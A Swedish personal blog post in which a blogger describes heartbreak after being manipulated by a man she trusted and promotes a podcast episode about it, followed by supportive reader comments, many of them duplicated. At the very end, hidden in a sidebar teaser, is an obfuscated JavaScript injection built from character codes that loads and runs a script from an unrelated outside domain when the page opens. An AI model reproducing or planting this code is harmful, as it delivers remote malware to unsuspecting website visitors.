En oväntad vänskap, som ledde till kärlek. Trodde jag.

// I samarbete med I LIKE RADIO //

IMG_2562

Hej fina!

Lilleman och jag är precis tillbaka på svensk mark och fastland igen. Vi har trots omständigheterna haft ett fantastiskt dygn till sjöss tillsammans med Hälsokicken 💚

Preciiis den energifyllda bubbla med kollegor som jag behövde 🙏🏻❤

-TACK alla hälsokickare, kollegor och deltagare som gjorde detta till att oförglömligt dygn! 

Mer om den i ett senare inlägg. 

IMG_2193

idag är det söndag och vårat senaste poddavsnitt släppts.

TACK Åza för att du är du. Läs hennes blogg HÄR 

När vi kom in till inspelningsstudion tidigare i veckan så skulle ”veckans ämne” egentligen vara

”När blir en relation seriös, och när är det okay att flytta in tandborsten”

”Avsnittet som inte blev som planerat. My har varit med om något som gjort henne förkrossad och har svårt att hantera sin panikångest. Tårar blandas med ilska och Åza ger goda råd till sin sköra vän och amatör-analyserar vad det är som triggar igång Mys destruktiva beteende.”

MEN, med tanke på min dagsform när jag klev in i studion. Inte sovit så mycket som en timme. jag var HELT förkrossad. En Ångest inombords. En vecka from hell bakom mig, krockad bil, kraschad telefon, krossat hjärta.

Besviken och ledsen med tårar som strömmade längsmed kinderna…. Så fick vi efter samråd med producent kasta om dagordningen och flytta på ämnet. 

Jag trodde jag hade träffat den rätte.

 För ovanligheternas skull så hade jag tänkt ge någon en chans på RIKTIGT. Släppa honom mig väldigt nära. Jag såg INTE detta komma, jag trodde INTE att det skulle sluta såhär. Jag blev ordentligt manipulerad, för bakom ljuset,utnyttjad och tagen med storm av ett ordentligt ”honeymoon face”.

Jag föll för en person jag aldrig trodde att jag skulle falla för.

En oväntad vänskap som ledde till något annorlunda. En man som egentligen vara allt annat än vad jag både vill ha och borde falla för. Men med hans charm, hans kompetens och driv att ”göra om och göra rätt” så föll jag som en fura. jag lät mig manipuleras och tro på tomma ord och löften som aldrig skulle slå in.

Det blev en kostsam erfarenhet. På ALLA plan. 

Jag hade ännu inte kommit till stadiet där besvikelsen gick över till ilska när vi spelade in podden. Jag var i chock. I chock över hur situationen blev som den blev. Chockad över hur någon kan ha två så starka och samtidigt olika personligheter.

Jag tillåter mig att vara ledsen och sårad och tar med mig detta som ännu en erfarenhet.

Nu ligger fokus på mig själv och Lilleman. INGENTING är viktigare än Lilleman. _DS_1969

Tyvärr stannar det inte bara här,  vid ”bara” ett krossat hjärta och en hjärtesorg.

Det har dragit med sig en soppa. En soppa utan dess like som fått stora konsekvenser. En så bisarr situation att jag måste nypa mig i armen för att inte tro att jag fastnat i en mardröm .

Rent praktisk närmaste veckan ligger även fokus på att ”städa” upp soppan och distansera mig från vad jag trodde kunde vara Mr Right!

IN OCH LYSSNA PÅ HELA PODDAVSNITTET MED MULTIMAMMORNA HÄR  

Öppet, sårbart och brutalt ärligt.

Kram / My  Martens

76 Komentarer

 1. My kära my❤️Så jag önskar att du kunde få lugn o ro. Lyssnade på podden, mina tårar bara rann, kände din smärta. Kram från mig.

 2. Kämpa My, sluta leta efter män som du ska ta hand om. Det är du själv som gäller och din son INGEN annan. Samla ihop dig och skit i tönten som brände dig. Stäng och gå vidare. Och ja jag vet jag låter som en kärring…. jobba med dig själv, bygg upp din självkänsla. idioter träffar man alltid både i jobbet och privat. Du verkar vara smart så sök inte efter lycka genom likasinnade…du kan och ska inte hjälpa andra som har trasig bakgrund, hål i sin själ. Du ska bara stärka DIg. Bra poddavsnitt och Åza var grym vän till dig och självklart du till henne. Kämpa!!

 3. My kära my❤️Så jag önskar att du kunde få lugn o ro. Lyssnade på podden, mina tårar bara rann, kände din smärta. Kram från mig.

 4. Kämpa My, sluta leta efter män som du ska ta hand om. Det är du själv som gäller och din son INGEN annan. Samla ihop dig och skit i tönten som brände dig. Stäng och gå vidare. Och ja jag vet jag låter som en kärring…. jobba med dig själv, bygg upp din självkänsla. idioter träffar man alltid både i jobbet och privat. Du verkar vara smart så sök inte efter lycka genom likasinnade…du kan och ska inte hjälpa andra som har trasig bakgrund, hål i sin själ. Du ska bara stärka DIg. Bra poddavsnitt och Åza var grym vän till dig och självklart du till henne. Kämpa!!

 5. Hörde på podden tidigt i morse och blev så ledsen. Vilken otur att det inte var vad du hoppats på med den mannen. Men en dag ska du se att du träffar någon pålitlig kille. Gör det bästa du orkar för dig själv nu framöver. Många kramar ❤

 6. Först o främst vill jag ge dig en stor kram ? o till Åza oxå som verkar va en fin ärlig vän ? Låt dig sörja ett litet dag o ta med dig nåt som var bra tex att du vågade ju släppa in någon i ditt hjärta ? Kram

 7. Fan vilka idioter det finns där ute. Va själv singel ett tag o föll för en man som dumpade mig efter han fått mig i säng. Jag va kär o fick rejält dåligt självförtroende efter det men sen med tiden insåg jag vem han eg va- en riktig don Juan som haft massor av tjejer efter mig. Med det sagt – du har kanske inte träffat sista idioten än men tänk positivt! Lättare sagt än gjort men tänk om du flyttat ihop med honom? Tur det uppdagades nu än om jobbigt förstås. If you Go through hell just keep walking!
  Kram!

 8. Hörde på podden tidigt i morse och blev så ledsen. Vilken otur att det inte var vad du hoppats på med den mannen. Men en dag ska du se att du träffar någon pålitlig kille. Gör det bästa du orkar för dig själv nu framöver. Många kramar ❤

 9. Först o främst vill jag ge dig en stor kram 💕 o till Åza oxå som verkar va en fin ärlig vän 💕 Låt dig sörja ett litet dag o ta med dig nåt som var bra tex att du vågade ju släppa in någon i ditt hjärta 💕 Kram

 10. Fan vilka idioter det finns där ute. Va själv singel ett tag o föll för en man som dumpade mig efter han fått mig i säng. Jag va kär o fick rejält dåligt självförtroende efter det men sen med tiden insåg jag vem han eg va- en riktig don Juan som haft massor av tjejer efter mig. Med det sagt – du har kanske inte träffat sista idioten än men tänk positivt! Lättare sagt än gjort men tänk om du flyttat ihop med honom? Tur det uppdagades nu än om jobbigt förstås. If you Go through hell just keep walking!
  Kram!

 11. My jag finner inte ord för vad du hamnat i. Det finns skitstövlar i miljoner, och en del av dem kan man inte se på utsidan vad dom är för sort, tyvärr. Men att du skulle behöva träffa en, är beklagligt.
  Kan bara skicka en stor kram och hoppas att du repar dig och blir ännu starkare.
  Bamsekramar

 12. My jag finner inte ord för vad du hamnat i. Det finns skitstövlar i miljoner, och en del av dem kan man inte se på utsidan vad dom är för sort, tyvärr. Men att du skulle behöva träffa en, är beklagligt.
  Kan bara skicka en stor kram och hoppas att du repar dig och blir ännu starkare.

  Bamsekramar

 13. Glöm aldrig, att den eviga & stora kärleken finns!! <3
  Jag träffade min älskade livs kamrat vid 18 års ålder, det sa PANG & vi blev blixtförälskade! vi har aldrig dippat en enda gång i vårt förhållande som nu varat i 35 kärleksfyllda år! <3 & det kittlar fortfarande i kroppen när jag ser på honom!
  En timme i taget, en dag i taget, andas & ta livet med dom små stegen nu, stäng inte inne känslorna, LEV du värdefulla mamma & människa!! <3
  Varm kram <3

 14. Din PT kompis är inte värdig dig!! Du är så mkt bättre än det My 💞 Hitta nån kille som uppskattar dig. Stor kram

 15. Hoppas allt ordnar upp sig o konsekvenserna som kommit med det här vad det nu är! Svårt för dig att jobba kvar där nu om ni är arbetskamrater? Stor kram My!!!

 16. Glöm aldrig, att den eviga & stora kärleken finns!! <3

  Jag träffade min älskade livs kamrat vid 18 års ålder, det sa PANG & vi blev blixtförälskade! vi har aldrig dippat en enda gång i vårt förhållande som nu varat i 35 kärleksfyllda år! <3 & det kittlar fortfarande i kroppen när jag ser på honom!

  En timme i taget, en dag i taget, andas & ta livet med dom små stegen nu, stäng inte inne känslorna, LEV du värdefulla mamma & människa!! <3

  Varm kram <3

 17. För 10-15 år sedan fattade jag beslutet att aldrig mer ha en relation med en man eftersom jag såg ett mönster av att även s.k påstått ”snälla” killar, bara orsakade mig och mitt liv en massa problem och bekymmer. Sedan den dagen har jag varit genuint lycklig, fått självförtroende och självkänsla och idag har jag många nära och trygga relationer med mina tjejkompisar som gillar mig precis som jag är.

 18. Hoppas allt ordnar upp sig o konsekvenserna som kommit med det här vad det nu är! Svårt för dig att jobba kvar där nu om ni är arbetskamrater? Stor kram My!!!

 19. För 10-15 år sedan fattade jag beslutet att aldrig mer ha en relation med en man eftersom jag såg ett mönster av att även s.k påstått ”snälla” killar, bara orsakade mig och mitt liv en massa problem och bekymmer. Sedan den dagen har jag varit genuint lycklig, fått självförtroende och självkänsla och idag har jag många nära och trygga relationer med mina tjejkompisar som gillar mig precis som jag är.

 20. detta var inte det du behövde nu. Att få hjärtat krossat. Tur att du har så fin vän som Åza. Stark, rak, ärlig, med hjärtat på rätt ställe.
  Kärleksrelationer kan sluta så. Tänker inte döma killen ifråga, då jag bara hört en utsaga, din egen.
  Men man måste våga för att vinna. du kommer att träffa mr right, som är mr right för dig. Det finns ett lock till varje gryta, höhö.
  hjärtekramis

 21. detta var inte det du behövde nu. Att få hjärtat krossat. Tur att du har så fin vän som Åza. Stark, rak, ärlig, med hjärtat på rätt ställe.
  Kärleksrelationer kan sluta så. Tänker inte döma killen ifråga, då jag bara hört en utsaga, din egen.
  Men man måste våga för att vinna. du kommer att träffa mr right, som är mr right för dig. Det finns ett lock till varje gryta, höhö.
  hjärtekramis

 22. Fina, fina My <3 Det här var verkligen det sista du behöver/förtjänade… Jag lider med dig, men jag vet att du klarar detta också. Det är bara så ledsamt att du av alla ska behöva gå igenom ännu en sak…
  Jag kom också rödgråten till jobbet i morse, p.g.a av att jag lyssnade på er podd… Alltså shit, ni är så bra, även om den var ledsam just idag. Och vilken vän du har i Åza, så härligt ärlig… Er relation tar sig verkligen ut genom lurarna ?
  Sen kan jag tillägga… Jag är 42 år och har några trasiga förhållanden bakom mig.. Tills för tre år sedan då jag träffade prinsen. Du vet den där som alla pratar om… ? Du kommer också att träffa din prins. Ibland tar det bara lite tid och tyvärr så måste man kyssa en hel del paddor innan han dyker upp… Men jag är ett levande bevis på att han verkligen gör det.
  Alla mina varmaste kramar till dig!! Det löser sig, det gör det alltid.

  • Tråkigt att höra att vi gjorde dig ledsen Erika men väldigt roligt att höra att vår vänskap går igenom. Kram Å <3

 23. Fina, fina My <3 Det här var verkligen det sista du behöver/förtjänade… Jag lider med dig, men jag vet att du klarar detta också. Det är bara så ledsamt att du av alla ska behöva gå igenom ännu en sak…
  Jag kom också rödgråten till jobbet i morse, p.g.a av att jag lyssnade på er podd… Alltså shit, ni är så bra, även om den var ledsam just idag. Och vilken vän du har i Åza, så härligt ärlig… Er relation tar sig verkligen ut genom lurarna 🙂
  Sen kan jag tillägga… Jag är 42 år och har några trasiga förhållanden bakom mig.. Tills för tre år sedan då jag träffade prinsen. Du vet den där som alla pratar om… 🙂 Du kommer också att träffa din prins. Ibland tar det bara lite tid och tyvärr så måste man kyssa en hel del paddor innan han dyker upp… Men jag är ett levande bevis på att han verkligen gör det.
  Alla mina varmaste kramar till dig!! Det löser sig, det gör det alltid.

  • Tråkigt att höra att vi gjorde dig ledsen Erika men väldigt roligt att höra att vår vänskap går igenom. Kram Å <3

 24. Hur f….n är det möjligt att råka ut för så mycket elände som du gör??? Du skulle behöva isolera dig från folk tills du fått ordning på livet.

 25. Hur f….n är det möjligt att råka ut för så mycket elände som du gör??? Du skulle behöva isolera dig från folk tills du fått ordning på livet.

 26. Finaste my, jag är också ett maskros-barn som aldrig visste var en kärnfamilj är och har alltid varit den som tagit hand om alla, utom mig själv. Har jobbat mkt med mig själv (gått i psykodynamisk terapi 6 år, och utbildat mig till terapeut ) och har kommit att först hur min bipolära narcissistiska mamma påverkat mig negativt, och varit direkt farlig för mitt välmåendeJ ag har återförenats med min stackars far (som mamma har projicerat sin galenskap på) och så sakteliga har jag fått tillbaka mitt egenvärde, lugn och inre balans.. Då ordnar det oftast upp sig, och saker och ting faller på plats;) Att jag funnit världens snällaste man vid 40 är bara en ynnest;-) Du är en tjej med ett stort hjärta, som du behöver lära dig att rikta inåt. Att ha goda, uppriktiga vänner med ärliga intentioner år så betydelsefullt! Jag är glad att ni har varandra, du och Åza. Varm kram till dig, Lilleman och kissarna från Medelhavet.

 27. Finaste my, jag är också ett maskros-barn som aldrig visste var en kärnfamilj är och har alltid varit den som tagit hand om alla, utom mig själv. Har jobbat mkt med mig själv (gått i psykodynamisk terapi 6 år, och utbildat mig till terapeut ) och har kommit att först hur min bipolära narcissistiska mamma påverkat mig negativt, och varit direkt farlig för mitt välmåendeJ ag har återförenats med min stackars far (som mamma har projicerat sin galenskap på) och så sakteliga har jag fått tillbaka mitt egenvärde, lugn och inre balans.. Då ordnar det oftast upp sig, och saker och ting faller på plats;) Att jag funnit världens snällaste man vid 40 är bara en ynnest;-) Du är en tjej med ett stort hjärta, som du behöver lära dig att rikta inåt. Att ha goda, uppriktiga vänner med ärliga intentioner år så betydelsefullt! Jag är glad att ni har varandra, du och Åza. Varm kram till dig, Lilleman och kissarna från Medelhavet.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/